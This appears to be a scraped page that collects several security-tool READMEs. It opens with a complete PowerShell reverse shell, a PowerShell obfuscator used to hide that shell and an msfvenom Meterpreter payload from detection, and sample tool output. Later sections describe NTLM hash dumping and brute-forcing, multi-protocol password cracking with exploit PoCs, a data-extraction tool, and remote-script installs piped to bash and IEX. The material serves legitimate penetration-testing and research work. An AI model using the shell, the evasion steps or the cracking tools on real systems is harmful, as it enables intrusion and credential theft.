$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) Generator 1 >> 65535 >> $((65535)) [*] Obfuscating strings Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0)) Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) [*] Obfuscating cmdlets Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '') [*] Writing payload to /home/tristram/obfuscated.ps1 [*] Done" dir="auto">
┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444)
Generator 1 >> 65535 >> $((65535))
[*] Obfuscating strings
Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51))
Generator 2 >> PS >> $([char](1 *80/1)+[char](86+83-86)+[char](0+32-0))
Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_})
[*] Obfuscating cmdlets
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '')
[*] Writing payload to /home/tristram/obfuscated.ps1
[*] Done

Obfuscated PowerShell Reverse Shell

Meterpreter PowerShell Shellcode

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 686 bytes
Final size of ps1 file: 3385 bytes
Saved as: meterpreter.ps1
PS /home/kali> . ./Invoke-PSObfuscation.ps1
PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
[*] Obfuscating variables
[*] Writing payload to o-meterpreter.ps1
[*] Done

Comment-Based Help

<#
.SYNOPSIS
Transforms PowerShell scripts into something obscure, unclear, or unintelligible.

.DESCRIPTION
Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression,
they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation
focuses on replacing the existing components of your code, or layer 0, with alternative values.

.PARAMETER Path
A user provided PowerShell payload via a flat file.

.PARAMETER All
The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive
and could result in your payload being broken. There should be no issues when using this with the vanilla reverse
shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of
the generators introduced in this script may even confuse your ISE so be sure to test properly.

.PARAMETER Aliases
The aliases switch is used to instruct the function to obfuscate aliases.

.PARAMETER Cmdlets
The cmdlets switch is used to instruct the function to obfuscate cmdlets.

.PARAMETER Comments
The comments switch is used to instruct the function to remove all comments.

.PARAMETER Integers
The integers switch is used to instruct the function to obfuscate integers.

.PARAMETER Methods
The methods switch is used to instruct the function to obfuscate method invocations.

.PARAMETER NamespaceClasses
The namespaceclasses switch is used to instruct the function to obfuscate namespace classes.

.PARAMETER Pipes
The pipes switch is used to in struct the function to obfuscate pipes.

.PARAMETER PipelineVariables
The pipeline variables switch is used to instruct the function to obfuscate pipeline variables.

.PARAMETER ShowChanges
The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen.

.PARAMETER Strings
The strings switch is used to instruct the function to obfuscate prompt strings.

.PARAMETER Variables
The variables switch is used to instruct the function to obfuscate variables.

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\revshell.ps1 -All

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1

.OUTPUTS
System.String, System.String

.NOTES
Additional information abo ut the function.
#>


CertWatcher - A Tool For Capture And Tracking Certificate Transparency Logs, Using YAML Templates Based DSL


CertWatcher is a tool for capture and tracking certificate transparency logs, using YAML templates. The tool helps to detect and analyze phishing websites and regular expression patterns, and is designed to make it easy to use for security professionals and researchers.



Certwatcher continuously monitors the certificate data stream and checks for suspicious patterns or malicious activity. Certwatcher can also be customized to detect specific phishing patterns and combat the spread of malicious websites.

Get Started

Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.

Useful Links

Contribution

If you want to contribute to this project, follow the steps below:

  • Fork this repository.
  • Create a new branch with your feature: git checkout -b my-new-feature
  • Make changes and commit the changes: git commit -m 'Adding a new feature'
  • Push to the original branch: git push origin my-new-feature
  • Open a pull request.

Authors



DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Secuirty Numbers And More From Text


 DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Github

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated powershell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Webiste

Here I use wget to make a request to stackoverflow then I forward the body text to ds . The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to uniq which removes any non unique files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all mac addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifer string infront of the results. In this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below will will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e used to search for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. Its also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was ran 3 times and the average time was recorded.

Computer Specs

Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
Ram 12.0 GB (11.9 GB usable)

Searching all data types

Command Speed
cat test.txt | ds -t 00h:02m:04s
ds -t -f test.txt 00h:02m:05s
cat test.txt | ds -t -o output.txt 00h:02m:06s

Using specific queries

Command Speed Query Count
cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22 2
cat test.txt | ds -tF6c 00h:00m:32s 3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directorty searching mode
  • Base64 Detection and decoding


DC-Sonar - Analyzing AD Domains For Security Risks Related To User Accounts

DC Sonar Community

Repositories

The project consists of repositories:

Disclaimer

It's only for education purposes.

Avoid using it on the production Active Directory (AD) domain.

Neither contributor incur any responsibility for any using it.

Social media

Check out our Red Team community Telegram channel

Description

Architecture

For the visual descriptions, open the diagram files using the diagrams.net tool.

The app consists of:


Functionallity

The DC Sonar Community provides functionality for analyzing AD domains for security risks related to accounts:

  • Register analyzing AD domain in the app

  • See the statuses of domain analyzing processes

  • Dump and brute NTLM hashes from set AD domains to list accounts with weak and vulnerable passwords

  • Analyze AD domain accounts to list ones with never expire passwords

  • Analyze AD domain accounts by their NTLM password hashes to determine accounts and domains where passwords repeat

Installation

Docker

In progress ...

Manually using dpkg

It is assumed that you have a clean Ubuntu Server 22.04 and account with the username "user".

The app will install to /home/user/dc-sonar.

The next releases maybe will have a more flexible installation.

Download dc_sonar_NNNN.N.NN-N_amd64.tar.gz from the last distributive to the server.

Create a folder for extracting files:

mkdir dc_sonar_NNNN.N.NN-N_amd64

Extract the downloaded archive:

tar -xvf dc_sonar_NNNN.N.NN-N_amd64.tar.gz -C dc_sonar_NNNN.N.NN-N_amd64

Go to the folder with the extracted files:

cd dc_sonar_NNNN.N.NN-N_amd64/

Install PostgreSQL:

sudo bash install_postgresql.sh

Install RabbitMQ:

sudo bash install_rabbitmq.sh

Install dependencies:

sudo bash install_dependencies.sh

It will ask for confirmation of adding the ppa:deadsnakes/ppa repository. Press Enter.

Install dc-sonar itself:

sudo dpkg -i dc_sonar_NNNN.N.NN-N_amd64.deb

It will ask for information for creating a Django admin user. Provide username, mail and password.

It will ask for information for creating a self-signed SSL certificate twice. Provide required information.

Open: https://localhost

Enter Django admin user credentials set during the installation process before.

Style guide

See the information in STYLE_GUIDE.md

Deployment for development

Docker

In progress ...

Manually using Windows host and Ubuntu Server guest

In this case, we will set up the environment for editing code on the Windows host while running Python code on the Ubuntu guest.

Set up the virtual machine

Create a virtual machine with 2 CPU, 2048 MB RAM, 10GB SSD using Ubuntu Server 22.04 iso in VirtualBox.

If Ubuntu installer asks for updating ubuntu installer before VM's installation - agree.

Choose to install OpenSSH Server.

VirtualBox Port Forwarding Rules:

Name Protocol Host IP Host Port Guest IP Guest Port
SSH TCP 127.0.0.1 2222 10.0.2.15 22
RabbitMQ management console TCP 127.0.0.1 15672 10.0.2.15 15672
Django Server TCP 127.0.0.1 8000 10.0.2.15 8000
NTLM Scrutinizer TCP 127.0.0.1 5000 10.0.2.15 5000
PostgreSQL TCP 127.0.0.1 25432 10.0.2.15 5432

Config Window

Download and install Python 3.10.5.

Create a folder for the DC Sonar project.

Go to the project folder using Git for Windows:

cd '{PATH_TO_FOLDER}'

Make Windows installation steps for dc-sonar-user-layer.

Make Windows installation steps for dc-sonar-workers-layer.

Make Windows installation steps for ntlm-scrutinizer.

Make Windows installation steps for dc-sonar-frontend.

Set shared folders

Make steps from "Open VirtualBox" to "Reboot VM", but add shared folders to VM VirtualBox with "Auto-mount", like in the picture below:

After reboot, run command:

sudo adduser $USER vboxsf

Perform logout and login for the using user account.

In /home/user directory, you can use mounted folders:

ls -l
Output:
total 12
drwxrwx--- 1 root vboxsf 4096 Jul 19 13:53 dc-sonar-user-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 10:11 dc-sonar-workers-layer
drwxrwx--- 1 root vboxsf 4096 Jul 19 14:25 ntlm-scrutinizer

Config Ubuntu Server

Config PostgreSQL

Install PostgreSQL on Ubuntu 20.04:

sudo apt update
sudo apt install postgresql postgresql-contrib
sudo systemctl start postgresql.service

Create the admin database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: admin
Shall the new role be a superuser? (y/n) y

Create the dc_sonar_workers_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_workers_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the dc_sonar_user_layer database account:

sudo -u postgres createuser --interactive
Output:
Enter name of role to add: dc_sonar_user_layer
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

Create the back_workers_db database:

sudo -u postgres createdb back_workers_db

Create the web_app_db database:

sudo -u postgres createdb web_app_db

Run the psql:

sudo -u postgres psql

Set a password for the admin account:

ALTER USER admin WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_workers_layer account:

ALTER USER dc_sonar_workers_layer WITH PASSWORD '{YOUR_PASSWORD}';

Set a password for the dc_sonar_user_layer account:

ALTER USER dc_sonar_user_layer WITH PASSWORD '{YOUR_PASSWORD}';

Grant CRUD permissions for the dc_sonar_workers_layer account on the back_workers_db database:

\c back_workers_db
GRANT CONNECT ON DATABASE back_workers_db to dc_sonar_workers_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_workers_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_workers_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_workers_layer;

Grant CRUD permissions for the dc_sonar_user_layer account on the web_app_db database:

\c web_app_db
GRANT CONNECT ON DATABASE web_app_db to dc_sonar_user_layer;
GRANT USAGE ON SCHEMA public to dc_sonar_user_layer;
GRANT ALL ON ALL TABLES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL SEQUENCES IN SCHEMA public TO dc_sonar_user_layer;
GRANT ALL ON ALL FUNCTIONS IN SCHEMA public TO dc_sonar_user_layer;

Exit of the psql:

\q

Open the pg_hba.conf file:

sudo nano /etc/postgresql/12/main/pg_hba.conf

Add the line for the connection to allow the connection from the host machine to PostgreSQL, save changes and close the file:

# IPv4 local connections:
host all all 127.0.0.1/32 md5
host all admin 0.0.0.0/0 md5

Open the postgresql.conf file:

sudo nano /etc/postgresql/12/main/postgresql.conf

Change specified below params, save changes and close the file:

listen_addresses = 'localhost,10.0.2.15'
shared_buffers = 512MB
work_mem = 5MB
maintenance_work_mem = 100MB
effective_cache_size = 1GB

Restart the PostgreSQL service:

sudo service postgresql restart

Check the PostgreSQL service status:

service postgresql status

Check the log file if it is needed:

tail -f /var/log/postgresql/postgresql-12-main.log

Now you can connect to created databases using admin account and client such as DBeaver from Windows.

Config RabbitMQ

Install RabbitMQ using the script.

Enable the management plugin:

sudo rabbitmq-plugins enable rabbitmq_management

Create the RabbitMQ admin account:

sudo rabbitmqctl add_user admin {YOUR_PASSWORD}

Tag the created user for full management UI and HTTP API access:

sudo rabbitmqctl set_user_tags admin administrator

Open management UI on http://localhost:15672/.

Install Python3.10

Ensure that your system is updated and the required packages installed:

sudo apt update && sudo apt upgrade -y

Install the required dependency for adding custom PPAs:

sudo apt install software-properties-common -y

Then proceed and add the deadsnakes PPA to the APT package manager sources list as below:

sudo add-apt-repository ppa:deadsnakes/ppa

Download Python 3.10:

sudo apt install python3.10=3.10.5-1+focal1

Install the dependencies:

sudo apt install python3.10-dev=3.10.5-1+focal1 libpq-dev=12.11-0ubuntu0.20.04.1 libsasl2-dev libldap2-dev libssl-dev

Install the venv module:

sudo apt-get install python3.10-venv

Check the version of installed python:

python3.10 --version

Output:
Python 3.10.5
Hosts

Add IP addresses of Domain Controllers to /etc/hosts

sudo nano /etc/hosts

Layers

Set venv

We have to create venv on a level above as VM VirtualBox doesn't allow us to make it in shared folders.

Go to the home directory where shared folders located:

cd /home/user

Make deploy steps for dc-sonar-user-layer on Ubuntu.

Make deploy steps for dc-sonar-workers-layer on Ubuntu.

Make deploy steps for ntlm-scrutinizer on Ubuntu.

Config modules

Make config steps for dc-sonar-user-layer on Ubuntu.

Make config steps for dc-sonar-workers-layer on Ubuntu.

Make config steps for ntlm-scrutinizer on Ubuntu.

Run

Make run steps for ntlm-scrutinizer on Ubuntu.

Make run steps for dc-sonar-user-layer on Ubuntu.

Make run steps for dc-sonar-workers-layer on Ubuntu.

Make run steps for dc-sonar-frontend on Windows.

Open https://localhost:8000/admin/ in a browser on the Windows host and agree with the self-signed certificate.

Open https://localhost:4200/ in the browser on the Windows host and login as created Django user.



Shomon - Shodan Monitoring Integration For TheHive


ShoMon is a Shodan alert feeder for TheHive written in GoLang. With version 2.0, it is more powerful than ever!


Functionalities

  • Can be used as Webhook OR Stream listener

    • Webhook listener opens a restful API endpoint for Shodan to send alerts. This means you need to make this endpoint available to public net
    • Stream listener connects to Shodan and fetches/parses the alert stream
  • Utilizes shadowscatcher/shodan (fantastic work) for Shodan interaction.

  • Console logs are in JSON format and can be ingested by any other further log management tools

  • CI/CD via Github Actions ensures that a proper Release with changelogs, artifacts, images on ghcr and dockerhub will be provided

  • Provides a working docker-compose file file for TheHive, dependencies

  • Super fast and Super mini in size

  • Complete code refactoring in v2.0 resulted in more modular, maintainable code

  • Via conf file or environment variables alert specifics including tags, type, alert-template can be dynamically adjusted. See config file.

  • Full banner can be included in Alert with direct link to Shodan Finding.

  • IP is added to observables

Usage

  • Parameters should be provided via conf.yaml or environment variables. Please see config file and docker-compose file

  • After conf or environment variables are set simply issue command:

    ./shomon

Notes

  • Alert reference is first 6 chars of md5("ip:port")
  • Only 1 mod can be active at a time. Webhook and Stream listener can not be activated together.

Setup & Compile Instructions

Get latest compiled binary from releases

  1. Check Releases section.

Compile from source code

  1. Make sure that you have a working Golang workspace.
  2. go build .
    • go build -ldflags="-s -w" . could be used to customize compilation and produce smaller binary.

Using Public Container Registries

  1. Thanks to new CI/CD integration, latest versions of built images are pushed to ghcr, DockerHub and can be utilized via:
    • docker pull ghcr.io/kaansk/shomon
    • docker pull kaansk/shomon

Using Dockerfile

  1. Edit config file or provide environment variables to commands bellow
  2. docker build -t shomon .
  3. docker run -it shomon

Using docker-compose file

  1. Edit environment variables and configurations in docker-compose file
  2. docker-compose run -d

Credits



Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Has Leaked Previously To Prevent Targeted Password Reuse Attacks


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords has leaked previously to prevent targeted password reuse attacks.


Why develop another password manager ?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state of the art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation to make it harder for attacker to conduct brute force attacks.
    • Aes-gcm256 for database encryption.
  • Custom encrypted key-value database which ensures data integrity.(Read the blog post I wrote about it here.)
  • Easy to install and to use. Does not require connection to an external service for its core functionality.
  • Check if your passwords are leaked before to avoid targeted password reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 digits to XposedOrNot.

Installation

Pmanager depends on "pkg-config" and "libssl-dev" packages on ubuntu. Simply install them with

sudo apt install pkg-config libssl-dev -y

Download the binary file according to your current OS from releases, and add the binary location to PATH environment variable and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system. But you should be able to build it from the source ("cargo build --release"). since there are no OS specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexade cimal characters to xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...


  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent。red team tools Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, do not repeat the wheel, unless there are bugs, problems
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
  • Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE- 2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results Using nmap additionally requires setting the root password to an environment variable

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG COUNT AUTHOR COUNT DIRECTORY COUNT SEVERITY COUNT TYPE COUNT
cve 1294 daffainfo 605 cves 1277 info 1352 http 3554
panel 591 dhiyaneshdk 503 exposed-panels 600 high 938 file 76
lfi 486 pikpikcu 321 vulnerabilities 493 medium 766 network 50
xss 439 pdteam 269 technologies 266 critical 436 dns 17
wordpress 401 geeknik 187 exposures 254 low 211
exposure 355 dwisiswant0 169 misconfiguration 207 unknown 7
cve2021 322 0x_akoko 154 token-spray 206
rce 313 princechaddha 147 workflows 187
wp-plugin 297 pussycat0x 128 default-logins 101
tech 282 gy741 126 file 76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *.xxx.com, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
    • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
      1. Intelligently handle http abnormal pages, and fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch for batch, touch typing
    • There will be time in the future to implement the golang version how to use?
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr 


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

    1. Start Elasticsearch, of course you can use the traditional way to output, results
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query
  • Please install nmap by yourself before use Using Help
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
  • Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
  • Integrate more fuzzers , such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • how use Cookie?
  • libpcap related question

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301 并发多实例的bug
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 添加dcom Protocol enumeration network interfaces
  • 2022-06-30 嵌入式集成私人版本nuclei-templates 共3744个YAML POC; 1、集成Elasticsearch存储中间结果 2、嵌入整个config目录到程序中
  • 2022-06-27 优化模糊匹配,提高正确率、鲁棒性;集成ksubdomain进度
  • 2022-06-24 优化指纹算法;增加工作流程图
  • 2022-06-23 添加参数ParseSSl,控制默认不深度分析SSL中的DNS信息,默认不对SSL中dns进行扫描;优化:nmap未自动加.exe的bug;优化windows下缓存文件未优化体积的bug
  • 2022-06-22 集成11种协议弱口令检测、密码爆破:ftp、mongodb、mssql、mysql、oracle、postgresql、rdp、redis、smb、ssh、telnet,同时优化支持外挂密码字典
